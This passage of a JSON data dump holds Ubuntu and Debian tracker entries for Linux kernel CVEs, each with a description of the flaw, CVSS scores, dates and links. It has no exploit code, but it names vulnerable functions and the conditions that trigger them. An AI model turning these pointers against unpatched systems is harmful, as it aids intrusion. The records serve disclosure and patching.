(flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.2, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-03T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2847", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2847"], "modified": "2016-03-03T00:00:00", "id": "UB:CVE-2016-2847", "href": "https://ubuntu.com/security/CVE-2016-2847", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-04T14:13:53", "description": "The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux\nkernel 4.4.22 through 4.4.28 contains extended asm statements that are\nincompatible with the exception table, which allows local users to obtain\nroot access on non-SMEP platforms via a crafted application. NOTE: this\nvulnerability exists because of incorrect backporting of the CVE-2016-9178\npatch to older kernels.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | 1c109fabbd51863475cd12ac206bdd249aee35af was applied to the 4.4 stable series (in xenial as 1c109fabbd51863475cd12ac206bdd249aee35af) to fix CVE-2016-9178, and then got reverted from stable in 4.4.30 (in xenial as 2da13e7f631bb13658e00e61fdea050da25e69e7). 548acf19234dbda5a52d5a8e7e205af46e9da840 was also very briefly applied to stable in 4.4.29, but reverted at the same time due to problems (in xenial as 102d19689b2dd4f639a14dfd3f52ce19b5d7bb17). For xenial/4.4 derived kernels, this CVE is fixed with the reversion in 2da13e7f631bb13658e00e61fdea050da25e69e7. However, this leaves CVE-2016-9178 unfixed.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-27T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9644", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9178", "CVE-2016-9644"], "modified": "2016-11-27T00:00:00", "id": "UB:CVE-2016-9644", "href": "https://ubuntu.com/security/CVE-2016-9644", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-04T14:13:54", "description": "The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux\nkernel before 4.7.5 does not initialize a certain integer variable, which\nallows local users to obtain sensitive information from kernel stack memory\nby triggering failure of a get_user_ex call.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | the fix for this introduces CVE-2016-9644. NOTE: This is only an issue if 1c109fabbd51863475cd12ac206bdd249aee35af (added in 4.8) is backported without also backporting 548acf19234dbda5a52d5a8e7e205af46e9da840 (added in 4.6). However, the first attempt at backporting 548acf19234dbda5a52d5a8e7e205af46e9da840 was pulled shortly thereafter. The git commit for xenial is 1f4da631f0159d77908edb10f15e84642980cf16.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-27T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9178", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9178", "CVE-2016-9644"], "modified": "2016-11-27T00:00:00", "id": "UB:CVE-2016-9178", "href": "https://ubuntu.com/security/CVE-2016-9178", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2023-06-07T14:56:56", "description": "The offset2lib patch as used in the Linux Kernel contains a vulnerability that allows a PIE binary to be execve()'ed with 1GB of arguments or environmental strings then the stack occupies the address 0x80000000 and the PIE binary is mapped above 0x40000000 nullifying the protection of the offset2lib patch. This affects Linux Kernel version 4.11.5 and earlier. This is a different issue than CVE-2017-1000371. This issue appears to be limited to i386 based systems.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T16:29:00", "type": "debiancve", "title": "CVE-2017-1000370", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000370", "CVE-2017-1000371"], "modified": "2017-06-19T16:29:00", "id": "DEBIANCVE:CVE-2017-1000370", "href": "https://security-tracker.debian.org/tracker/CVE-2017-1000370", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T14:57:12", "description": "Yann Collet LZ4 before r119, when used on certain 32-bit platforms that allocate memory beyond 0x80000000, does not properly detect integer overflows, which allows context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted Literal Run, a different vulnerability than CVE-2014-4611.", "cvss3": {}, "published": "2014-07-03T04:22:00", "type": "debiancve", "title": "CVE-2014-4715", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4611", "CVE-2014-4715"], "modified": "2014-07-03T04:22:00", "id": "DEBIANCVE:CVE-2014-4715", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4715", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T14:56:54", "description": "Integer overflow in the LZ4 algorithm implementation, as used in Yann Collet LZ4 before r118 and in the lz4_uncompress function in lib/lz4/lz4_decompress.c in the Linux kernel before 3.15.2, on 32-bit platforms might allow context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted Literal Run that would be improperly handled by programs not complying with an API limitation, a different vulnerability than CVE-2014-4715.", "cvss3": {}, "published": "2014-07-03T04:22:00", "type": "debiancve", "title": "CVE-2014-4611", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4611", "CVE-2014-4715"], "modified": "2014-07-03T04:22:00", "id": "DEBIANCVE:CVE-2014-4611", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4611", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T14:56:56", "description": "The offset2lib patch as used by the Linux Kernel contains a vulnerability, if RLIMIT_STACK is set to RLIM_INFINITY and 1 Gigabyte of memory is allocated (the maximum under the 1/4 restriction) then the stack will be grown down to 0x80000000, and as the PIE binary is mapped above 0x80000000 the minimum distance between the end of the PIE binary's read-write segment and the start of the stack becomes small enough that the stack guard page can be jumped over by an attacker. This affects Linux Kernel version 4.11.5. This is a different issue than CVE-2017-1000370 and CVE-2017-1000365. This issue appears to be limited to i386 based systems.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T16:29:00", "type": "debiancve", "title": "CVE-2017-1000371", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000365", "CVE-2017-1000370", "CVE-2017-1000371"], "modified": "2017-06-19T16:29:00", "id": "DEBIANCVE:CVE-2017-1000371", "href": "https://security-tracker.debian.org/tracker/CVE-2017-1000371", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T14:56:55", "description": "arch/arm64/mm/dma-mapping.c in the Linux kernel before 4.0.3, as used in the ION subsystem in Android and other products, does not initialize certain data structures, which allows local users to obtain sensitive information from kernel memory by triggering a dma_mmap call.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-10-10T10:59:00", "type": "debiancve", "title": "CVE-2015-8950", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8950"], "modified": "2016-10-10T10:59:00", "id": "DEBIANCVE:CVE-2015-8950", "href": "https://security-tracker.debian.org/tracker/CVE-2015-8950", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-03T14:41:17", "description": "The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux kernel before 4.7.5 does not initialize a certain integer variable, which allows local users to obtain sensitive information from kernel stack memory by triggering failure of a get_user_ex call.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-28T03:59:00", "type": "debiancve", "title": "CVE-2016-9178", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9178"], "modified": "2016-11-28T03:59:00", "id": "DEBIANCVE:CVE-2016-9178", "href": "https://security-tracker.debian.org/tracker/CVE-2016-9178", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-07T14:56:55", "description": "Race condition in the ip4_datagram_release_cb function in net/ipv4/datagram.c in the Linux kernel before 3.15.2 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging incorrect expectations about locking during multithreaded access to internal data structures for IPv4 UDP sockets.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-02-07T07:59:00", "type": "debiancve", "title": "CVE-2014-9914", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9914"], "modified": "2017-02-07T07:59:00", "id": "DEBIANCVE:CVE-2014-9914", "href": "https://security-tracker.debian.org/tracker/CVE-2014-9914", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:56:34", "description": "The Direct Rendering Manager (DRM) subsystem in the Linux kernel through 4.x mishandles requests for Graphics Execution Manager (GEM) objects, which allows context-dependent attackers to cause a denial of service (memory consumption) via an application that processes graphics data, as demonstrated by JavaScript code that creates many CANVAS elements for rendering by Chrome or Firefox.", "cvss3": {}, "published": "2015-10-16T01:59:00", "type": "debiancve", "title": "CVE-2013-7445", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7445"], "modified": "2015-10-16T01:59:00", "id": "DEBIANCVE:CVE-2013-7445", "href": "https://security-tracker.debian.org/tracker/CVE-2013-7445", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-07T14:56:58", "description": "arch/arm64/kvm/guest.c in KVM in the Linux kernel before 4.18.12 on the arm64 platform mishandles the KVM_SET_ON_REG ioctl. This is exploitable by attackers who can create virtual machines. An attacker can arbitrarily redirect the hypervisor flow of control (with full register control). An attacker can also cause a denial of service (hypervisor panic) via an illegal exception return. This occurs because of insufficient restrictions on userspace access to the core register file, and because PSTATE.M validation does not prevent unintended execution modes.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-10-07T06:29:00", "type": "debiancve", "title": "CVE-2018-18021", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-18021"], "modified": "2018-10-07T06:29:00", "id": "DEBIANCVE:CVE-2018-18021", "href": "https://security-tracker.debian.org/tracker/CVE-2018-18021", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-06-05T18:14:29", "description": "The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel before 4.13.4 allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for /dev/sg0.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-04T01:29:00", "type": "debiancve", "title": "CVE-2017-14991", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14991"], "modified": "2017-10-04T01:29:00", "id": "DEBIANCVE:CVE-2017-14991", "href": "https://security-tracker.debian.org/tracker/CVE-2017-14991", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-05T18:14:32", "description": "The do_check function in kernel/bpf/verifier.c in the Linux kernel before 4.11.1 does not make the allow_ptr_leaks value available for restricting the output of the print_bpf_insn function, which allows local users to obtain sensitive address information via crafted bpf system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-22T22:29:00", "type": "debiancve", "title": "CVE-2017-9150", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9150"], "modified": "2017-05-22T22:29:00", "id": "DEBIANCVE:CVE-2017-9150", "href": "https://security-tracker.debian.org/tracker/CVE-2017-9150", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-03T14:41:17", "description": "The replace_map_fd_with_map_ptr function in kernel/bpf/verifier.c in the Linux kernel before 4.5.5 does not properly maintain an fd data structure, which allows local users to gain privileges or cause a denial of service (use-after-free) via crafted BPF instructions that reference an incorrect file descriptor.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-23T10:59:00", "type": "debiancve", "title": "CVE-2016-4557", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4557"], "modified": "2016-05-23T10:59:00", "id": "DEBIANCVE:CVE-2016-4557", "href": "https://security-tracker.debian.org/tracker/CVE-2016-4557", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:56:35", "description": "Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel before 4.3.3 allows local users to bypass intended AF_UNIX socket permissions or cause a denial of service (panic) via crafted epoll_ctl calls.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2015-12-28T11:59:00", "type": "debiancve", "title": "CVE-2013-7446", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.4, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7446"], "modified": "2015-12-28T11:59:00", "id": "DEBIANCVE:CVE-2013-7446", "href": "https://security-tracker.debian.org/tracker/CVE-2013-7446", "cvss": {"score": 5.4, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2023-06-07T14:56:55", "description": "Stack consumption vulnerability in the parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local users to cause a denial of service (uncontrolled recursion, and system crash or reboot) via a crafted iso9660 image with a CL entry referring to a directory entry that has a CL entry.", "cvss3": {}, "published": "2014-09-01T01:55:00", "type": "debiancve", "title": "CVE-2014-5471", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:L/AC:H/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5471"], "modified": "2014-09-01T01:55:00", "id": "DEBIANCVE:CVE-2014-5471", "href": "https://security-tracker.debian.org/tracker/CVE-2014-5471", "cvss": {"score": 4.0, "vector": "AV:L/AC:H/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-06T14:56:34", "description": "The Linux kernel before 3.12.4 updates certain length values before ensuring that associated data structures have been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call, related to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c, net/ipv6/raw.c, and net/ipv6/udp.c.", "cvss3": {}, "published": "2014-01-06T16:55:00", "type": "debiancve", "title": "CVE-2013-7263", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7263"], "modified": "2014-01-06T16:55:00", "id": "DEBIANCVE:CVE-2013-7263", "href": "https://security-tracker.debian.org/tracker/CVE-2013-7263", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-06-07T14:56:55", "description": "The KVM subsystem in the Linux kernel through 4.2.6, and Xen 4.3.x through 4.6.x, allows guest OS users to cause a denial of service (host OS panic or hang) by triggering many #DB (aka Debug) exceptions, related to svm.c.", "cvss3": {}, "published": "2015-11-16T11:59:00", "type": "debiancve", "title": "CVE-2015-8104", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8104"], "modified": 